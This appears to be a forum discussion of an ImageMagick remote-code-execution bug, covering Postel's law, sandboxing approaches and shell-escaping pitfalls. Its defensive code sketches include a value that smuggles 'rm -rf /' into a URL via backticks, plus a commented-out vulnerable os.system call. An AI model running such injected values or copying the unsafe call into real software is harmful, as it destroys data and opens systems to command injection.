And this is precisely the point. If the very earliest browsers had insisted on correctness rather than permissively accepting broken HTML (and JS - see semicolon insertion), we would not now have a situation where browsers need to do a ton of work to allow graceful degradation in the face of awful markup, simply because the tooling would have evolved in the other direction. Postel's Law gains a little temporary sender convenience in exchange for a nasty mess of permanent receiver headaches.


Postel's law has two parts. Be gracious in what you receive is what most people are talking about, but be cautious in what you send is just as important. If people are using broken markup that's the problem that needs fixing. How many web devs bother with validation anymore? (And not for app like functionality, but for what should be simple text and images with a few menus - why are so many newspaper websites so awful?)

https://tools.ietf.org/html/rfc793

    2.10.  Robustness Principle

    TCP implementations will follow a general principle of robustness:  be
    conservative in what you do, be liberal in what you accept from
    others.


The problem is that being conservative and precise isn't enough. You and I can both be conservative, but disagree on the specifics (given an ambiguous spec, for instance). A permissive receiver of both our data now has to support both sides of our disagreement forever.


No they don't. They just have to not explode.


They do if they have any competition. Browsers are the perfect example here: a browser which responds to broken HTML by not working, but not exploding either, is going to lose out to one which does work. That means market forces pin the disagreement in place.


IE did well for many years. That's why people used quirks mode and work arounds.

What's the current market share for IE? 30% 40%? That seems pretty good for a browser which for years was a broken malware propagating mess.


Put more succinctly: Gresham's Law trumps Postel's Principle.


> but be cautious in what you send is just as important.

How are you going to enforce this for everyone?

> TCP implementations will follow a general principle of robustness (...)

This rule has worked well for TCP implementors in large part because of their circumstances, which are very different from those of browser implementors and Web developers:

(0) Priorities: How much do the following desiderata matter to each group: reliability, performance, new features?

(1) Skill: What skills does a representative programmer from each group have?

(2) Risk profile: How does each group cope with the possibility of design and implementation errors? How much technical debt are they willing to take?

I'd contend that Postel's law doesn't scale beyond relatively small groups of highly skilled programmers, for whom reliability is paramount and trumps all other considerations.


Exactly. So by being permissive from the start we now have this dumpster fire that prevents us from writing sane and performant code, because we have to accept crap input and guess at what the user actually wanted.

Imagine what C++ would look like if all compilers had to accept all different variations of it, and the result of compiling 100 almost valid C++ files should, as far as possible, be a program that runs in some sense.

Most of the web pages I have ever written have probably been ill-formed because browsers don't tell me what's wrong, and instead show me a (nearly) working web page.


> Imagine what C++ would look like if all compilers had to accept all different variations of it, and the result of compiling 100 almost valid C++ files should, as far as possible, be a program that runs in some sense.

C++ is still a lot more permissive than it could and should be.

> Most of the web pages I have ever written have probably been ill-formed because browsers don't tell me what's wrong, and instead show me a (nearly) working web page.

Same here. The idea that JavaScript ought to be permissive and forgiving because its target audience doesn't know what they're doing turned out to be a self-fulfilling prophecy on the part of its designers.


It would be a lot more sensible than you think. When I get a compilation error, what I do is take a breath, think about the meaning of my code, correct any logical mistakes I can find, and try to compile again. Why couldn't Web developers do the same?

Also, there's no need to crash the tab. The browser could simply stop running any JavaScript, and leave the user with a static page.


IIRC some of the older versions of Internet Explorer did something like that, showing the user a popup if an error happened and asking them if they wanted to keep going.


Next, browsers will show users a popup asking if they want to jump off a cliff.


The solution I've been experimenting with is to run this sort of code in an isolated, network-stack-free unikernel environment.

Imagine that you've built the ImageMagick library into a unikernel server using a virtio serial port for I/O. When you need to process an image, you boot a VM with this imagemagick kernel, then pipe the image data through its virtual serial port. Data goes in, data comes out...

And if the attacker manages remote code execution inside the VM, who cares? There's nothing in there. There's no network stack, there's no access to storage, there's no access to other processes; all you give this VM is the RAM and serial port the unikernel needs to do its job.


Or... you could just run it as nobody and maybe unshare its network and chroot it and not add the surface area of some virtio driver to your stack?

Like, there's no magic to a unikernel. It's just a process in a jail, unless you're legitimately running it directly on the cpu. Adding more layers of abstraction does not inherently add security.


It's the removal of abstraction layers which appeals to me. Why secure the kernel syscall interface when you can remove it? The hypervisor will be a potential attack surface anyway, so it's not a new point of vulnerability.

Sure, it's just a different kind of jail, but I'd rather start with a jail that is empty by default and add selected features to it when I'm convinced they're safe, than start with an ordinary apartment and remove things from it until I think it's secure enough to function as a jail cell.


I think the difference is that that seems like something I would screw up. I know how to make a $5 DigitalOcean instance that only has ImageMagick that I can pipe photos to and from. I don't trust myself to unshare the network from some running process without leaving other holes.

There are all these gotchas when you have stuff running in the same OS and it just takes one little mistake and your adversary has root.


I'm... very skeptical that it's trivial to make a $5 DO instance you can pipe imagemagick to from another host and has nothing else on it. Note that if you're talking about using a linux image, this is not even remotely a unikernel.

Also, there are still myriad ways this kind of interface can represent an attack surface if you aren't sufficiently careful with the communication protocol (that presumably you are writing).


tl;dr Unix security model is too hard to use. Let's put another layer of crap around it!


Don't be reductive – OP made a very good point, and you're not arguing it head-on.

> There are all these gotchas when you have stuff running in the same OS and it just takes one little mistake and your adversary has root.


How is "There are all these gotchas when you have stuff running in the same OS and it just takes one little mistake and your adversary has root" not saying that the Unix security model is too hard to use?


No, the Unix security model is insufficient.


"seccomp()" (the original strict mode) does pretty much this, but much more simply and efficiently: it disallows all system calls except read() and write() on existing file descriptors, plus exit() and sigreturn().

https://en.wikipedia.org/wiki/Seccomp


With containers I already get such security. For example, I can run ImageMagick binaries inside a container with no network, no capabilities and a minimal syscall interface. The attack surface of such a setup is not particularly larger than the hypervisor interface, but performance is much closer to that of a native executable.


If you can generate arbitrary content downstream, you can use this as a stage to a larger multi-stage attack.

And that assumes your unikernel environment has no subtle tricks to escape the jail.


Sure, "solution" might have been the wrong word. It's not the whole answer, but it is a potentially interesting way to reduce the attack surface.


I think before #1, #2, or Rust, we need a better "libsandbox". You don't even need containers to do this -- DJB showed how to do this with Unix over a decade ago [1]. See section 5.2: isolating single source transformations.

I think the reason people don't do this is because it's extremely platform-specific. Most of this C code runs on Windows too (ImageMagick, ffmpeg, etc.)

And it's complicated. But if there were a nice library to do all this stuff, I think people would use it.

If you're just shelling out to command line tools like ImageMagick, you don't even have to change any C code... you can just run it under a wrapper (sorta like systemd-nspawn). But I think most people are not using ImageMagick that way -- they are using a Python/Ruby binding, etc.

But it can still be done -- it just takes a little effort. MUCH less effort than changing any of that old crufty code, much less rewriting it in Rust!

[1] Some thoughts on security after 10 years of qmail -- https://scholar.google.com/scholar?cluster=98145703154405707...


This kind of problem is inherent to the Unix model of processes communicating by passing byte streams around. The way to solve it properly would be to make the process command interface something more structured (e.g. thrift/protobuf), so that rather than shelling out to wget --whatever and hoping you've escaped it correctly you'd pass an actually structured command.


The process command interface is more structured! You don't have to go through /bin/sh and worry about escaping. You could call exec. Ok, so you'd still have to worry about sticking "--" before the URL, but that's easy. No more worries about quoting.

Of course, chaining multiple commands together is a pain, and that's what the shell is good at, but then it is hard to get the quoting right. So: a more structured shell interface. There's libpipeline, but I haven't used it enough to comment.
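A sketch of that exec-style construction in Python, using the delegate command from the top of the thread as the assumed shape. The point is that the URL stays one argv element no matter what it contains:

```python
def delegate_argv(url, out_path):
    # exec()-style invocation: each list element is exactly one argument.
    # No shell is involved, so there is nothing to quote, and "--" ends
    # option parsing so a URL starting with "-" can't become a wget flag.
    return ["wget", "-q", "-O", out_path, "--", "https:" + url]
```

With subprocess-style APIs (execve, posix_spawn, Python's subprocess.run without shell=True) this list goes straight to the new process; the backticks in a hostile URL arrive as inert bytes.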


But images and videos are byte streams already... The security boundary is often the network, where things are serialized anyway. The whole point is to sandbox the deserialization only, which has a large attack surface due to complex conditionals and string handling.

The rest of the application will need to run with privileges to actually do the stuff you care about, like display things to your screen and so forth.


> But images and videos are byte streams already...

Right, but the reason for this bug (and many others) is the mingling of the data bytestream and the command channel (the arguments for the call to wget).

> The whole point is to sandbox the deserialization only, which has a large attack surface due to complex conditionals and string handling.

I don't think that would help. Your sandboxed deserializer deserializes the video file into an inert datastructure. But then you go to system() to wget based on that datastructure and you're pouring commands and data into a flat stream. That architecture won't stop you from parsing a bunch of unix commands as image bytes and then passing those "image bytes" on the command line.


DJB may be a prominent cryptographer, but his code and security practices, especially around Qmail, are simply atrocious. I wouldn't quote him on anything that touches real C code.


Can you elaborate on this? I have never thought of "atrocious" when someone mentioned the history of vulnerabilities in djb's software. Depending on how egregious these security practices are there could be a $500 check in it for you.


> I have never thought of "atrocious" when someone mentioned the history of vulnerabilities in djb's software.

You mean when DJB denied Qmail has bugs?

http://www.dt.e-technik.tu-dortmund.de/~ma/qmail-bugs.html

Unfortunately, 404 at the moment, but Internet Archive has a copy:

https://web.archive.org/web/20160409054053/http://www.dt.e-t...


Yes, "atrocious security" is not my reaction to a 15 year old MTA with two DoS and two RCEs.


Oh yes, because denying that your code has a vulnerability counts as a good security practice.

You know why this MTA has such a low count of published bugs? Because nobody uses it anymore, so nobody looks at its code (and factor in the ugliness of the code itself, which lowers the eagerness to look even further). It's not because the code is (magically?) better.


Uncompromising and inconvenient to work with, maybe. Why atrocious?


Have you seen, for example, how he structured his code? One file per C function, with no header files. And guess what? He still does that in new code.


One file per C function is an old practice you can still see in many libc implementations and in other pieces of code designed to be used as a static library. Since a traditional Unix static library is nothing but an archive of .o files, and a traditional Unix linker makes its include-or-omit decisions on the granularity of an .o file, putting each function in a separate source file maximizes the linker's ability to strip unused functions out of a static library.


One file per C function enables an attacker to _____ qmail/djbdns/etc. ???


glibc does something similar. I'm not sure I see the problem. It's different, but I wouldn't call it bad.


Sandboxes aren't the solution. Correctly designed and implemented programs and file formats are.


That's not really useful. If only we could "solve" security by telling everyone to write correct code.


Not by just telling people to write correct code. By rejecting incorrect code.


> So, we get it. Complicated file and network formats, handled in C code leads to these types of security issues.

Actually, the magic byte thing makes me think this is a content sniffing issue, and the RCE might be due to a "feature". Rust won't help or, at best, would make it more awkward to exploit.

A capability-based (i.e. memory-safe, no accessible globals that can induce side effects) system would mitigate this, though. If I call out to ImageMagick and say "rescale this image", ImageMagick should not be able to initiate network requests in response.


> A capability-based (i.e. memory-safe, no accessible globals that can induce side effects) system would mitigate this, though.

Check out OpenBSD's pledge, it's addressing precisely this problem.

http://man.openbsd.org/OpenBSD-current/man2/pledge.2


> Check out OpenBSD's pledge, it's addressing precisely this problem.

Au contraire.

You can fork(), restrict yourself to a couple of pipes in a subprocess, pledge(), do the calculation in the subprocess, and exit the subprocess. It'll work, and it'll be slow. But this isn't at all specific to pledge() -- seccomp can do exactly the same thing, arguably more simply. Performance will suck either way.

<rant>I have yet to see a credible argument for how pledge() is better than seccomp. You could almost implement pledge() as a library function that uses seccomp, and I consider the one part of pledge (execve behavior) that this won't get right to be a misfeature in pledge.</rant>

The performance of that scheme will be abysmal for anything that does very fine-grained sandboxing. What you want is language support. E (erights.org) does this as a matter of course. Rust and similar languages could if they were to allow subsetting of globally accessible objects. Java and .NET tried to do this and fell utterly flat.

I've considered trying to get a nice Linux feature to do this kind of sandboxing with kernel help (call a function that can only write to a certain memory aperture without the overhead of forking every time), and maybe I'll get this working some day.


There are several differences, e.g. pledge is not inherited across exec, while seccomp is. Also seccomp is vastly more complex, and it is not really possible to filter by e.g. filename, so you need additional tools.


You could indeed implement pledge as a seccomp wrapper; pledge wins because it's nearly trivial to add to programs.


Isn't intel's new memory protection keys feature intended to allow exactly this sort of thing?


Nope. Intel's MPX is an opt-in thing to assist with pointer bounds checking.


I was thinking of MPK, not MPX.

You'd set the library's code and data pages to protection key 1, along with the page containing a library access trampoline, leaving the rest of the address space with protection key 0. You'd call into the library through the trampoline, which would revoke access to protection key 0, call into the library, then restore access to key 0.


That's a whack-a-mole approach that doesn't even try to define a real security boundary. It will catch the most common errors, sure, but it's not a long-term solution.


> If I call out to ImageMagick and say "rescale this image", ImageMagick should not be able to initiate network requests in response.

Impossible in a world where programmers routinely cram together networking and file transformations without any regard for whether the operation belongs there or not (build systems that download random things from the internet on a `compile' command; even Rust's build system does such a dumb thing by downloading rustc after running an hour-long LLVM compilation, instead of failing before doing anything).


Hm, this should be in parallel. If downloading stage0 waits until after LLVM compiles, that's a bug, IMHO.


So the way to prevent robots from throwing people off a cliff is to use a capability system that only allows robots to kill people when explicitly authorized?


Is it C's fault here though?

Is it not just improper shell escaping? You could do that incorrectly in any language. If you're not quoting | and ` and stuff correctly when you call system() you're doomed no matter the language.
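A Python sketch of that contrast, with echo standing in for the real command (an assumption, just to keep it runnable):

```python
import shlex
import subprocess

payload = "//example.com/`rm -rf /`"

# Doomed in any language: interpolating untrusted input into a string that
# a shell will parse, which is what system() does:
#     os.system('wget -q -O out "https:%s"' % payload)   # backticks expand!

# If a shell truly cannot be avoided, quote every interpolated value:
cmd = "echo https:%s" % shlex.quote(payload)
result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
# The backticks come back as literal text; nothing inside them was executed.
```

Better still is to skip the shell entirely and pass an argument list, but when you are stuck with a system()-like interface, per-value quoting is the minimum.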


qmail has already been pointed to elsewhere in this discussion. One of the qmail security principles, which are fast approaching 20 years old, is the maxim: Don't parse. This is directly applicable here.

* http://cr.yp.to/qmail/guarantee.html

* http://cr.yp.to/qmail/qmailsec-20071101.pdf

The GNKSOA-MUA comes to mind, too. The other vulnerabilities (there being five -- see the mailing list message) are related to the idea of allowing input data files to contain embedded actions and commands to be executed by the data processing tool. In the world of mail there were many variations on this theme. Clifton T. Sharp Jr's Usenet signature was "Here, Outlook Express, run this program." "Okay, stranger.".

* http://homepage.ntlworld.com./jonathan.deboynepollard/Propos...


From googling and looking at the source, this looks like it has nothing to do with C; it's more of a logic error where a handler delegates control to another process (curl, for example) based on image type. I could be wrong, but that's what it looks like to me.


> 1. Simpler formats for file representation and data interchange. When someone tries to add an extra bitfield option, say no. When they keep trying, get a wooden stick with "no" written on it. Part of the disease of modern computing is bloated specs.

> 2. Restrictive not permissive code bases. Exit and bail out early. Tell the user "file corrupted". Push back.

The best talk on computer security I have seen is Meredith Patterson's Science of Insecurity at 28c3: https://www.youtube.com/watch?v=3kEfedtQVOY

It is really interesting that the techniques needed to achieve these security goals (the theory of grammars) come from one of the oldest and best-explored areas of computer science.


Shell metacharacter and option injection vulnerabilities exist in almost every language, not just C:

http://bonedaddy.net/pabs3/log/2014/02/17/pid-preservation-s... http://www.defensecode.com/public/DefenseCode_Unix_WildCards...


I've been writing Rust too, but I'm not sure why the argument that it'll reduce the attack surface is glib. It can't prevent all security holes, though, because nothing can.


1. is not applicable even in mid-term, unless you want to break the internet

2. is breaking the internet

I'm not sure I'm ready to accept the collateral damage of your solutions.

How about looking at "C" (or any other language with direct memory access) as the culprit? (EDIT: Assuming it's a C-issue after all and not just some dumb input validation problem.)


Hopefully it will convince developers to not trust the client and actually confirm the user uploaded a .jpg, .png or .gif. But I guess that isn’t nearly as useful for us when we want a reason why we need to rewrite everything. :)


You know what a lot of people do to confirm the user actually uploaded a jpg, png, or gif?

Use ImageMagick. http://www.imagemagick.org/script/identify.php


That's a pretty ridiculous answer considering the volume of existing C code and Rust being a new language.


If you don't like bitfields, you'd better stay away from H264/5.



